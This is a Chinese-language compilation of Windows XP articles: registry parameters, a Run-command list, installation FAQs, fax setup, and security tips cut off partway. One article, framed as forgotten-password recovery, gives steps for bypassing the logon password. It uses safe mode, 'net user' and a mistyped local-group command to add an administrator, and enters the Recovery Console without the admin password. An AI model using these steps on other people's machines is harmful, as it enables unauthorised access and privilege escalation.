下列参数可通过“网络连接”文件夹的“连接属性”设置。不需要直接配置它们。
EnableDns
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：如果此值设置为 1 (True)，则 NBT 向 DNS 查询无法被 WINS、广播或 LMHOSTS 文件解析的名称。
EnableLmhosts
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：1 (True)
说明：如果此值设置为 1 (True)，并且存在 LMHOSTS 文件，则 NBT 将在此文件中查找 WINS 或广播无法解析的名称。默认情况下，不存在 LMHOSTS 文件数据库目录（由 Tcpip\Parameters\DatabasePath 指定），因此不采取任何操作。此值通过“控制面板”的“网络”工具中的“高级 TCP/IP 设置”写入。
EnableProxy
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：如果此值设置为 1 (True)，则系统充当 NBT 绑定到的网络的代理名称服务器。代理名称服务器应答那些对它已通过 WINS 解析的名称进行的广播查询。代理名称服务器允许一个由 B 节点实现的网络连接到其他已注册到 WINS 的子网上的服务器。
NameServer
项：Netbt\Parameters\Interfaces\Tcpip_适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址（例如，11.101.1.200）
有效范围：任何有效的 IP 地址
默认值：空白（无地址）
说明：此参数指定主 WINS 服务器的 IP 地址。如果此参数包含有效的值，则它覆盖相同名称的 DHCP 参数。
NameServerBackup
项：Netbt\Parameters\Interfaces\Tcpip_适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址（例如，11.101.1.200）
有效范围：任何有效的 IP 地址。
默认值：空白（无地址）
说明：此参数指定备份 WINS 服务器的 IP 地址。如果此参数包含有效的值，则它覆盖相同名称的 DHCP 参数。
ScopeId
项：Netbt\Parameters
数值类型：REG_SZ - 字符串
有效范围：由两个点分部分组成的任何有效 DNS 域名，或者一个“*”。
默认值：无
说明：此参数指定节点的 NetBIOS 名称范围。该值不能以英文句点开头。如果此参数包含有效的值，它将覆盖具有相同名称的 DHCP 参数。空白值（空字符串）将被忽略。将此参数设置为“*”值表示空范围并且将覆盖 DHCP 参数。
不可配置的参数
以下参数由 NetBT 组件在内部创建和使用。无法使用注册表编辑器来修改它们。下面列出它们仅供参考。
DhcpNameServer
项：Netbt\Parameters\Interfaces\Tcpip_适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址（例如，11.101.1.200）
有效范围：任何有效的 IP 地址
默认值：无
说明：此参数指定主 WINS 服务器的 IP 地址。它是由 DHCP 客户端服务（如果已启用）写入的。有效的 NameServer 值将覆盖此参数。
DhcpNameServerBackup
项：Netbt\Parameters\Interfaces\Tcpip_适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址（例如，11.101.1.200）
有效范围：任何有效的 IP 地址
默认值：无
说明：此参数指定备份 WINS 服务器的 IP 地址。它是由 DHCP 客户端服务（如果已启用）写入的。有效的 BackupNameServer 值将覆盖此参数。
DhcpNodeType
项：Netbt\Parameters
数值类型：REG_DWORD - 数字
有效范围： 1 - 8
默认值： 1
说明：此参数指定 NBT 节点类型。它是由 DHCP 客户端服务（如果已启用）写入的。有效的 NodeType 值将覆盖此参数。有关完整说明，请参阅 NodeType 项。
DhcpScopeId
项：Netbt\Parameters
数值类型：REG_SZ - 字符串
有效范围：由点分隔的名称字符串，如“microsoft.com”
默认值：无
说明：此参数指定节点的 NetBIOS 名称范围。它是由 DHCP 客户端服务（如果已启用）写入的。该值不能以英文句点开头。有关更多信息，请参阅 ScopeId 项。
NbProvider
项：Netbt\Parameters
数值类型：REG_SZ - 字符串
有效范围：_tcp
默认值：_tcp
说明：此参数由 RPC 组件在内部使用。不应更改默认值。
TransportBindName
项：Netbt\Parameters
数值类型：REG_SZ - 字符串
有效范围：N/A
默认值：\Device\
说明：此参数在产品开发过程中在内部使用。不应更改默认值。
这篇文章中的信息适用于:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional


windows XP 登陆破解

《一键清理系统垃圾》

windows XP 登陆破解

  Windows XP强大而友好的系统界面博得了越来越多用户的青睐，然而它对用户安全性的审核即是非常严格的，要是你忘记了设置的口令（密码），可别以为能够像Windows98那样选择“取消”同样可以进入系统－－这一点相信安装Windows XP的你，是很清楚的。当然这也是有过痛苦的经历后，才被我们重视的。
  由于没有登陆口令，无法进入系统；起初的方法总是选择重新安装Windows XP，但这种方法但繁琐，而且费时费力，经过多次实验之后，终于找到了一个可以不需要任何其它软件，就可破解Windows XP登录口令的方法：

  但是破解登陆口令，需要有两个必要的前提：
  1.安装Windows XP的分区必须采用FAT32文件系统；
  2.用户名中没有汉字。

在确认满足这两个条件后，即可执行以下步骤，来破解登陆口令。

  1.开机启动Win XP，当运行到“正在启动Windows XP”的提示界面时，按“F8”键调出系统启动选择菜单，选择“带命令行安全模式”；
  2.当运行停止后，会列出“Administrator”和其它用户的选择菜单(本例的其他用户以xpuser01为例)，选择“Administrator”后回车，进入命令行模式；
  3.键入命令““net user xpuser01 1234/ADD”这是更改该用户密码的命令，命令中的“1234”是更改后的新密码，如果键入的用户不存在（xpuser01），那么系统会自动添加这个用户。
  4.另外还可以使用“net 1oca1group administrator xpuser01 /ADD”命令把xpuser01这个用户升为超级用户，即可拥有所有权限。
  5.最后一步，就是重新启动计算机，在登录窗口中输入刚刚更改的新密码便可成功登陆。

  对于NTFS系统

  可用windows 2000 的光盘启动电脑，在安装选择界面选择修复 windows 2000 (按R键)，然后选择使用故障控制台修复(按C键)，系统会扫描现有的 window 2000/XP 版本，过一会儿，就列出了登陆选择，选择一个，回车。见到了吗。。是不是不需要输入管理员密码就可以直接登入写故障恢复控制台模式(用windows XP 的安装光盘启动是要求输入密码的)
  进入了故障恢复控制台，当然就可以进行任何的系统级别的操作。包括：复制，移动，删除文件，启动、停止服务，甚至格式化，重新分区等破坏性操作。
此破解不但在XP下通过，而且在XP+SP1，甚至XP+SP3英文版都通过
注意：windows 2000 的安装光盘有的有显示故障控制台登陆选项，有的没有。(主要是有的盗版光盘为了节约，呵呵)

   如果你正在为丢失了登陆口令而烦恼的话，不妨试一试此方法。


WINDOWS XP 开始→运行→命令 集锦

《一键清理系统垃圾》

WINDOWS XP 开始→运行→命令 集锦

winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令

dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器

net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器

packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器

regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序

osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令

iexpress-------木马捆绑工具，系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略


Windows XP安装问题解答精选

《一键清理系统垃圾》

Windows XP安装问题解答精选

2002-01-17　　　　　　　 作者：

    不管你是喜欢还是厌恶，微软的最新一代操作系统Windows XP如期伴随比尔.盖茨那大男孩般的笑容发布了。到底是好是坏还是让时间去见证，但面对XP的诱惑，相信越来越多的朋友都想尝一下鲜。由于Windows XP对硬件、软件的运行环境比以前的操作系统要求更严格，所以很多朋友在安装时总会遇到各种问题。下面我就向大家介绍一下安装Windows XP时常遇到的问题及解决方法，希望对你有所帮助。

    Windows XP的Home及Professional版本, 我该选择哪个?

    Windows XP Home：属于家用型操作系统，支持数字摄影、音乐、计算机游戏以及网际网络的功能，提供家庭使用者简单易用的环境。

    Windows XP Professional：属于商用型操作系统，加强与Windows 服务器整合的能力，提供的更严密的安全性。

    注：Windows XP Professional版本，包含所有Windows XP Home所有的功能。下表为Home与Professional两版本主要功能差异一览表：

功能　Windows XP Professional　Windows XP Home
远程端桌面控制 Yes　No
离线档案与文件夹 Yes　No
多处理器支持 2　1
加密档案系统 Yes　No
权限帐号 Yes　No
计算机网域帐号支持 Yes　No
群组原则 Yes　No
远程安装服务 Yes　No
MUI多国语言接口 Yes　No
IIS服务 Yes　No
IPSec加密功能 Yes　No
NetWare客户端服务 Yes　No
使用拨号网络登入网络服务 Yes　No
漫游使用者 Yes　No

    目前现有的Windows版本中，哪些能够直接升级到Windows XP？

Upgrade From　Windows XP Home　Windows XP Professional
Win3.x, Win95 No　No
Windows 98 Yes　Yes
Windows ME Yes　Yes
Windows NT 3.x Workstation No　No
Windows NT 4.0 Workstation Up to SP4 No　No
Windows NT 4.0 Workstation SP5 or Higher No　Yes
Windows 2000 Professional No　Yes
Windows Server Products No　No
Windows XP Home Edition Yes　Yes
Windows XP Professional No　Yes

    请参照下表：

    如何把已经升级到Windows XP的系统，恢复到原来的操作环境？

    (1)如果你是从Windows98/98SE/ME直接升级到Windows XP操作系统的：可以运行"[控制面板]/[ 添加/删除程序]/[卸载Windows XP ]"，就可以恢复到先前Windows版本。

    注意：如果升级后，你曾运行过以下其中任一项操作，则无法恢复到先前系统。

    A、将磁盘分区格式转换为NTFS；

    B、运行[磁盘清理]工具；

    (2)如果你是由WinNT/2000操作系统升级到Windows XP：由于它们的内核相同，这是单向的步骤。也就是说，当你的系统已经升级到Windows XP之后就无法恢复到原来的操作系统，只有重新安装了，所以在升级请考虑清楚是否要直接升级。

    建议：如果你还拿不定主意是否最终选择Windows XP，那么你最好把原来的系统备份起来或使用多重启动，将Windows XP安装在不同分区或硬盘上。这样可以防止由于软、硬件的兼容性导致升级失败，而造成数据资料的丢失。

    安装Windows XP前须注意什么？

    (1)不论你使用的是台式PC或笔记本电脑，请先与你的PC厂商确定是否有其安装或升级应注意事项，或安装后的搭配问题，有些厂商会利用此机会推出新的BIOS来支持Windows XP新的功能规格。

    (2)事先确认外设是否有更新的驱动程序或搭配Windows XP应注意事项：厂商会告诉你Windows XP是否有含此外围设备的驱动程序？自动侦测时是否会有问题？厂商是否有更新驱动程序的计划？原来Windows的驱动程序可否在Windows XP继续使用等信息。你可以通过以下方法来检测：放入Windows XP安装光盘，在根目录下运行setup.exe，选择"[检查系统兼容性]/[自动检查我的系统]"。系统会自动检查你的硬件及软件，并报告所有潜在的冲突。此外你可以www.microsoft.com/hcl/来确认你的外围配备是否在Windows XP硬件兼容性测试规格内。

    (3)建议你不要超频你的CPU。

    (4)关闭BIOS之病毒侦测功能以及电源管理系统。关闭病毒侦测方法：在BIOS FEATURES SETUP里的Virus Warning 设定成Disabled。

    (5)关闭电源管理系统：请在 POWER MANAGEMENT SETUP 里的Power Management 设定成Disables。

    (6)如有装设KeyPro(保护卡)也请卸下，等安装完毕后再装回。

    (7)在运行安装程序之前最好进行病毒扫瞄。

    (8)在运行安装程序之前先运行 ScanDisk 或 Chkdsk，检查有无坏扇区或坏轨。

    (9)如果你有任何有关于硬件或软件的问题，请在安装 Windows XP中文版之前先行修复。

    (10)备份Autoexec.bat及Config.sys到软盘上 。

    (11)删除 Config.sys 及 Autoexec.bat 文件中所有不必要的程序。这些程序包括 Undelete 程序、防毒软件、启动组态程序或任何磁盘公用程序等。

    (12)将BIOS设成Load setup default或Load BIOS default。

    (13)删除安装时不需要的硬件装置 (如：声卡、MPEG卡，或其它特殊之适配卡)

    如何使Windows 9x/NT/2000/XP共同安装在同一台电脑上？

    若要让Windows 9x, Windows NT, Windows 2000及Windows XP同时可以在一台机器上安装，必须先考虑档案格式必须为FAT16、FAT32或NTFS的档案格式。

    (1)Windows 98或Windows Millennium与Windows XP并存：

    a.启动磁盘的档案格式必须为FAT16或FAT32，不可为NTFS；原因是Win98/Me不支持NTFS的档案格式。

    b.安装顺序为先装Win98/Me，再直接从Win98/Me操作系统下运行WinXP的安装程序，则自动会形成双重启动的启动画面。

    (2)Windows NT 4.0或Windows 2000与Windows XP并存：

    a.启动磁盘的档案格式必须为FAT16或NTFS，不可为FAT32；原因是Windows NT不支持FAT32的档案格式。(注：Windows 2000 可以为FAT32)。

    b.安装顺序为先装Windows NT 4.0或Windows 2000，再直接从Windows NT 4.0或Windows 2000操作系统下运行Windows XP的安装程序，则自动会形成双重启动启动画面。(请注意Windows NT必需先升级到Service Pack 5以上的版本)。

    (3)Windows 98或Windows Millennium, Windows NT 4.0或Windows 2000及Windows XP同时存在：

    a.启动磁盘的档案格式必须为FAT16，不得为FAT32及NTFS；因为Windows 98 或Windows Millennium不支持NTFS，而Windows NT不支持FAT32。

    b.安装顺序为先装Windows 98或Windows Millennium，再直接从Windows 98或Windows Millennium 操作系统下运行Windows NT 4.0或Windows 2000安装程式，(注：Windows NT后请升级至SP5以上的版本)，然再到Windows NT 4.0或Windows 2000的操作系统下运行Windows XP的安装程序，则自动会形成三重启动的启动画面。

    如何设定使用Windows XP传真功能？

    (1)打开[控制面板] 中的 [添加/删除程序]。

    (2)按一下[添加/删除 Windows 组件]，在 [Windows 组件] 中，选取 [传真服务] 复选框，并遵循屏幕上的指示进行。

    (3)启动[传真] 组件：请按 [开始]，依序指向 [所有程序]、[附件] 及 [通讯]，再按 [传真控制台]即可。

    如果硬件或BIOS与Windows XP的ACPI规格不符时，在安装时会有什么问题？

    如果安装Windows XP时，第一次重新启动计算机后，画面就停留在Windows XP启动画面，无法完成安装程序。建议你与主机板厂商联系，更新你的BIOS。若你无法立即更新BIOS，你可以进入Bios选单，查看Bios Power Management Setup 中 Disable "ACPI function"。并重新运行windows XP安装时按F5，在出现的选项中，选择Standard PC，以便完成windows XP安装。但完成安装后将无法使用ACPI各项功能。

    如何利用Ghost方式来快速安装Windows XP到多台硬件设备相同的计算机？

    如果你单位有多台相同硬件设备的计算机，你想利用"Symantec Ghost"这类产品所做的映像档(image file)来快速安装Windows XP在这些计算机时，你可使用"SYSPREP" TOOL修改本机计算机的 [安全性识别码 (SID)]，让它成为每台计算机的专用识别码。

    A、运行步骤：

    (1)请先利用WINZIP，解压缩SysPrep tool(在Windows XP安装光盘，路径 support oolsdeploy.cab)。

    (2)准备复制主要安装：先在某一台主计算机上安装 Windows XP Professional，你可选择安装及自定Microsoft Office、Internet Explorer 收藏夹项目等应用程序 。

    (3)运行Sysprep.exe。注意：请先确定Sysprep.exe及Setupcl.exe 档案都在本机硬盘的 %systemdrive%Sysprep 文件夹中，或是在Windows 启动菜单出现时插入的磁盘中。如果 Setupcl.exe 和 Sysprep.exe 不在同一个目录，Sysprep 无法运作。

    (4)在旗标里选择 [MiniSetup] 与 [PNP] ，然后选择〔重新安装〕，在关机项目里，可自行选择重新启动计算机或直接关机 。

    (5)如果计算机符合 ACPI，它会自行关机。否则会出现对话框指出你现在可以安全的关闭计算机。

    (6)关机后，你就可以运行GHOST程序，将运行过SysPrep的Windows XP，制作成映像档(image file)。

    B、当用Ghost方式复制安装Windows XP的硬盘安装到计算机后，使用者开启计算机时，会出现下列对情况：

    (1)随插即用开始侦测 - 约需 3 分钟；

    (2)请你指定使用者的名称及组织；

    (3)请你加入网域或工作群组；

    (4)请你指定地区选项信息；

    (5)请你指定 TAPI 信息；

    (6)请你指定要安装的网络通讯协议及服务；

    (7)请你删除 %systemdrive% 中有 Sysprep.exe 及 Sysprep.inf 的本机 Sysprep 文件夹。

    C、注意事项：

    (1)先在测试的机器测试过，再依照实际的环境做必要的调配 。

    (2)若要将 SysPrep 使用成磁盘复制程序的一部份，则必须遵守下列规定：

    a、主要安装及目的地计算机的硬件抽象层 (HAL) 必须兼容。例如：HAL APIC 及 HAL MP (多处理器系统) 是兼容的，而 HAL PIC (Programmable Interrupt Controller) 与 HAL APIC 或 HAL MP是不兼容的。

    b、参照计算机与目的地计算机之间的大型存放装置控制器 (IDE 或 SCSI) 必须相同。调制解调器、声卡、网络卡、视讯卡等随插即用装置，不一定要相同。但是，运行 Sysprep 之前，Drivers.cab 中没有的装置驱动程序，应该放入主要安装中。或是让未安装的驱动程序在初次运行目的地计算机时都有效，以便让随插即用 可侦测到后，完成安装驱动程序的程序。

    c、目的地计算机的硬盘空间，至少必须与主要安装的硬盘大小相同。如果目的地计算机的硬盘较大，这项差异不会列入主要磁盘分区中。但如果它采用 NTFS 档案系统格式，你可以使用 Sysprep.inf 档案中的 ExtendOemPartition 项目来延伸主要磁盘分区。

    d、[如果参照计算机及目的地计算机的 BIOS 版本不同，你应该先测试处理程序确定能否成功。使用 Sysprep 运行磁盘重复时，Sysprep 会修改本机计算机的 [安全性识别码 (SID)]，让它成为每台计算机的专用识别码]

    如果无法以光盘启动的方式来安装Windows XP时，该怎么办？

    对于这个问题你可以通过制作Windows XP启动磁盘启动后，再安装windows XP。请按照以下步骤来制作Windows XP启动磁盘：首先，请先准备六片空白的1.44MB软盘，然后从微软件网站下载相对版本的简体中文制作档案，下载完毕后，直接运行该档案，并依照指示将空白磁盘放入软盘机中即可。

    如何解决某些老式芯片(如S3)的显卡，在Windows XP平台上卷动屏幕画面时容易发生画面静止问题?

    发生这种情形时，请重新启动进入Windows XP后，依照下列方法处理：选择"[开始]/[ 所有程序]/[控制面板]"，然后双击[显示]图标，在出现面板中选择"[设置]/[高级]/[疑难解答]"，将"硬件加速"功能从最大设为无。注意: 为彻底解决此问题，你最好到相关网站下载或更新驱动程序以及BIOS。


Windows XP安装中的潜在危险 必学知识

《一键清理系统垃圾》

Windows XP安装中的潜在危险 必学知识

   XP是微软推出的视窗操作系统中，迄今以来体积最大、安装所需时间最长，功能也号称最强大的产品。安装XP的时间基本需要50～80分钟左右，那么在这么长的时间里，XP到底干了些什么呢？为什么有的人声称安装XP破坏了他们原来的系统或是文件呢，我们就来仔细地看看XP安装时候的关键步骤，让大家明白安装XP操作的安全要点：

    一、解压数据包、拷贝临时文件

    安装程序主要是在C盘先建立一个临时目录，把安装程序中某些压缩包内的文件释放到该目录里，为安装做好准备。XP的压缩安装文件已经达到了数百兆，拷贝到临时目录里的也有二、三百兆，所以在DOS安装的话必须加载SMARTDRV.EXE，忘记了的话安装过程会加长数倍，注意！要在CONFIG.SYS里先加载HIMEM.SYS，否则光键入SMARTDRV是无效的。一般这个过程要8～15分钟，看你的硬件能力而定。没加载SMARTDRV的人可能会因为拷贝过程特别漫长，以为死机而强行重新启动损坏分区表。这是第一种危险。

    二、检查分区情况和原来的Windows版本

    从Windows2000开始，微软的安装程序已经带有检测用户硬盘及分区的能力。如果你的分区还没格式化，安装程序还提供格式化分区的功能，可以将之格式为FAT、FAT32、NTFS等等，微软推荐的格式是NTFS，而且在列表中会出现将安装的分区格式为NTFS的选项。如果用户是新手，选择格式化为NTFS，万一XP的安装程序在转化格式的时候又中途死机的话，很可能也会破坏分区表，而且NTFS不能用DOS的启动盘启动，新手很有可能会不知所措，强行用FDISK重新分区而损失所有数据。这是第二个危险，建议新手还是用FAT32格式好。如果真要转化，建议用PQ分区大师来，又快又安全。

    三、安装程序接管引导区

    在拷贝临时文件的同时，XP的安装程序也向C盘引导区写入加载NT内核所需的启动基本文件。如果你在安装程序拷贝文件的时候强行按RESET重启，或是发生死机、掉电等意外，那么XP的安装接管工作很可能还没完成，你的系统很可能会瘫痪——很多人抱怨XP破坏了他们的系统，很可能就是拷贝文件和接管引导区的步骤中出了问题——即使你原来安装有其他版本的Windows也无效，因为XP的安装程序设定其引导文件具有最高的优先权。所以你必须准备好一张DOS系统盘以防万一，真的有意外的话，要用系统盘引导后，进入XP的安装目录再次启动安装程序来修复。如果是正常退出的话，XP的安装程序会自动在下次继续安装任务。这个接管过程是一个很重要的步骤，也是第三个危险的步骤。
    四、继续拷贝、解压文件并检测即插即用设备

    进入XP的安装图形界面后，安装程序开始继续拷贝文件。主要是向安装XP的正式目录生成应用程序组和菜单等等。待XP的安装已经进入后期，它将非常严格地检测你的硬件配置，以便为即插即用的硬件设备安装正确的驱动程序——很多兼容性不好的机器会在此步骤蓝屏或是自动跳出或死机，如果你超频了系统或用了假冒的名牌鼠标，出问题的机率很大，这也是个潜在的死机后丢失数据的危险。

    五、最后的提示

    检测完设备并拷贝完文件后，XP会再次要求用户重新启动计算机，以便让加载的驱动程序生效，一般新装的机器可在2到3分钟内完成此过程。此时XP终于安装完毕，大家应见到蓝色背景的“欢迎使用”的字样，可正式“试用”了（因为还要激活）。如果你的主板CMOS掉电了，导致系统日期设定为1999年这样的无效日期，XP的日期检验机制会在“欢迎使用”的界面里锁定电脑，不作任何提示也无任何选项，除了个鼠标能动外就像死机一样，新手如果没留意日期，无论用任何修复操作都将无效，很可能会以为安装失败而格式化分区，丢失数据——所以小心你的启动XP的日期哦。

    特别要指出的是，由于XP是微软迄今最新的操作系统，它的安装程序设置了最高的优先权，可写入更新旧文件，会在不提示的情况下覆盖默认路径的文件。如果你选择的是升级安装，那么原来Windows默认路径内的文件有丢失的危险。这也是部分用户近期反映较集中的一个问题，所以大家最好不要把重要的文件放在安装XP的分区，特别不要放在C盘，这也是很多病毒经常攻击的区域——最好让XP独占一个分区。

    建议大家首先把安装程序拷贝到硬盘目录里，避免安装过程中读光盘出错。祝大家安装和使用XP一切顺利。


Windows XP传真功能详解

《一键清理系统垃圾》

Windows XP传真功能详解

2002-03-07　　 作者：石英

    在宽带网迅速普及的今天，我们手上的Modem好像已经“廉颇老矣”，用它上网的话速度太慢了，在惨遭淘汰之后，陪伴我们无数个日日夜夜的小猫就没有任何价值了吗？当然不是，我们还可以通过你手上的Modem发送和接收传真，其效果是非常理想的，这样既可以使我们的Modem重新焕发青春，又可以为我们的电脑增加一项实际的功能。

你用宽带了吗？速度很快吧！可是那样一来我们手上的Modem就没事儿干了，那么Modem是不是就变成了一块“食之无味，弃之可惜”的鸡肋了呢？别忘了Modem可是一个数字信号和模拟信号相互转换的设备呀，它和传真机的基本工作原理其实都是一样的，只不过传真机比Modem多了个“扫描仪”和“打印机”的功能罢了。那么我们能不能把Modem变成一台传真机呢？完全可以，像Windows XP就为我们提供了非常完善的传真功能，可以让我们的Modem摇身一变，成为一台网络传真机。

设置传真机
首先需要说明的是，如果你还在用Modem上网，那么就不需要设置什么了；如果你已经不用Modem上网，那么只需像以前拨号上网时那样重新添加一遍就可以了，这里就不再多说了。接下来让我们一起来看看如何设置传真。在Windows XP的默认安装方式中是没有传真机的，所以我们要先添加传真机，单击“开始”→“打印机和传真”，我们将会看到“打印机和传真”的对话框，如下图所示，单击“设置传真”。

接下来Windows将为我们安装和配置传真机的组件，如下图所示。

安装完毕后，我们可以在“打印机和传真”的对话框中看到一个名为“Fax”的图标。双击此图标，我们将看到“传真配置向导”，单击“下一步”，我们来设置一下传真号码、电子邮件、电话号码等发件人信息，如下图所示。

填好后，单击“下一步”，我们就完成了对传真的配置，单击“完成”。此时Windows将弹出“传真控制台”对话框，此对话框与Outlook的界面非常相似，使用起来也大同小异。如下图所示。

发送传真
对传真机设置完成后，就可以准备发送传真了。首先单击“文件” →“发送传真”，我们将看到“传真发送向导”对话框，如下图所示。

单击“下一步”，填写收件人的信息，主要包括收件人的姓名和传真机的号码，然后单击“添加”，如下图所示。

填写完毕后单击“下一步”，将出现“准备首页”的对话框，在此对话框中我们将设置首页的格式以及信息，Windows XP为我们提供了四 种模板，我们可以方便地按照模板的格式来设计我们的传真，单击“发件人信息”，填写一些自己认为需要的个人信息，其他栏目我们只要根据提示填写就可以了，如下图所示。

接着单击“下一步”，根据自己的需要选择发送时间以及优先级，如下图所示。

单击“下一步”，可以预览一下传真的效果，满意后单击“完成”，完成传真发送向导。

这时电脑将通过你的Modem开始发送传真，“传真监视器”的对话框也将自动弹出来，如下图所示。

至此，发送传真的全过程便结束了，需要特别说明的是前面提到的“传真首页模板”一项，Windows XP一共给我们提供了四个模板，当然我们也可以自己设计模板，在“传真控制台”的界面中，单击“工具” →“个人首页” →“新建”，即可自行设计传真的首页模板。

接收传真
Windows XP同样也为我们准备了接收传真的功能，我们只需要在“传真控制台”中，单击“文件” →“立即接收传真”，即可接收到你的传真了，在“传真控制台”中的“收件箱”便可以阅读到刚刚接收到的传真了，如下图所示。

怎么样，用Windows XP接收和发送传真还是很方便的吧！其实早在Windows 95时，微软就已经为我们提供了传真功能。可不知为什么，到了Windows 98又不提供此功能了。还好，Windows XP又把此功能捡了回来。而且功能和稳定性上都有了很大的提高，使我们的Modem又焕发了青春。Modem是一个使数字信号与模拟信号相互转变的设备，电脑上的传真功能正是利用Modem这一特性来实现发送和接收传真的。如果你的电脑配有扫描仪、打印机的话，那可就成了一台真正的传真机了。


Windows XP的八大安全策略逐个细解

《一键清理系统垃圾》

Windows XP的八大安全策略逐个细解

    Windows XP凭借其超强的稳定性和可靠的安全性吸引了众多用户使用它。笔者在与Windows XP的“接触”中，细心留意了一些安全方面的操作策略，现在把它整理成文，以期抛砖引玉。

    1、屏蔽不需要的服务组件

    尽管服务组件安装得越多，用户可以享受的服务功能也就越多。但是用户平时使用到的服务组件毕竟还是有限，而那些很少用到的组件不但占用了不少系统资源，会引起系统不稳定外，它还会为黑客的远程入侵提供了多种途径，为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。具体的操作方法为：首先在控制面板中找到"服务和应用程序"图标，然后再打开"服务"对话框，在该对话框中选中需要屏蔽的程序，并单击鼠标右键，从弹出的快捷菜单中依次选择"属性"/ "停止"命令，同时将"启动类型"设置为"手动"或"已禁用"，这样就可以对指定的服务组件进行屏蔽了。

    2、起用电源保护功能

    使用电脑处理文件时，最担心的就是计算机突然掉电，因为这种突然掉电不但会使自己的辛勤劳动成果顷刻间化为乌有，严重的话还能使计算机受到损伤。为了防止各种情况下的意外掉电，保证计算机的安全正常工作，我们应该在电源管理中启用按下电源按钮时询问或直接休眠的功能。如果您要启动电源保护功能的话，可以用鼠标在Windows XP的桌面上依次单击“我的电脑”/“控制面板”/“电源选项”，在弹出的设置框中选择“高级”标签，在对应的标签页面下找到“按下计算机电源按钮时”设置项，然后在设置框中选择“休眠”或者“问我要做什么”选项，如果选择“关机”选项的话，就相当于没有起用电源保护功能。

    3、对重要信息进行加密

    为防止其他人在使用自己的电脑时，偷看自己存储在电脑中的文件信息，Windows XP特意为我们普通用户提供了“文件和文件夹加密”功能，利用该功能我们可以对存储在电脑中的重要信息进行加密，这样其他用户在没有密码的情况下是无法访问文件或者文件夹中的内容的。在对文件进行加密时，我们首先打开Windows XP的资源管理器，然后在资源管理器操作窗口中找到需要进行加密的文件或者文件夹，然后用鼠标右键单击选中的文件或文件夹，从弹出的快捷菜单中选择“属性”命令，随后Windows XP会弹出文件加密对话框，单击对话框中的“常规”标签，然后再依次选择“高级”/“加密内容以便保护数据”就可以了。

    4、锁定您的计算机

    如果在使用电脑的过程中因有急事需要短暂离开电脑的话，许多人因担心自己的电脑会被别人占用，往往会采取先关机，后离开，然后回来再开机的办法来处理，但这样频繁开关机器对电脑是不利的。那我们有没有办法做到既不要关机又能防止其他人使用自己的计算机呢？办法当然是有的啦，您可以通过双击桌面快捷方式来迅速锁定键盘和显示器，而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。在锁定您的计算机时，您可以参照如下的步骤来执行：先用鼠标右键单击Windows XP的桌面，然后在右键菜单中依次选择"新建"/"快捷方式"，随后按照屏幕提示，在命令行的文本框中输入"rundll32.exe user32.dll,LockWorkStation"命令字符，再在随后的向导窗口中输入对应该快捷方式的具体名称，在这里为方便以后调用，您可以直接为该快捷方式取名为"锁定计算机"就可以了。以后您只要双击桌面上的“锁定计算机”，就可以达到锁定的目的了。

    5、使用“连接防火墙”功能

